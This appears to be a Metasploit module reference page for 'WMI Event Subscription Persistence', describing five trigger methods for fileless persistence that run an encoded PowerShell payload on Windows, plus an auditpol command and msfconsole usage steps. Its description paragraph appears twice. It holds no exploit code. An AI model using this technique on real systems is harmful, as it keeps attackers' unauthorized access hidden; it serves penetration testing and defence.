module
WMI Event Subscription Persistence
| Disclosed | Created |
|---|---|
| 06/06/2017 | 05/30/2018 |
Disclosed
06/06/2017
Created
05/30/2018
Description
This module will create a permanent WMI event subscription to achieve file-less persistence using one
of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
(default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON
method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS
method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method
creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER
before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command
(note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is
activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.
of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
(default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON
method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS
method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method
creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER
before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command
(note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is
activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.
Author
Nick Tyrer <@NickTyrer>
Platform
Windows
References
Module Options
To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:
msf > use exploit/windows/local/wmi_persistence
msf /(e) > show actions
...actions...
msf /(e) > set ACTION < action-name >
msf /(e) > show options
...show and set options...
msf /(e) > run
NEW
Explore Exposure Command
Confidently identify and prioritize exposures from endpoint to cloud with full attack surface visibility and threat-aware risk context.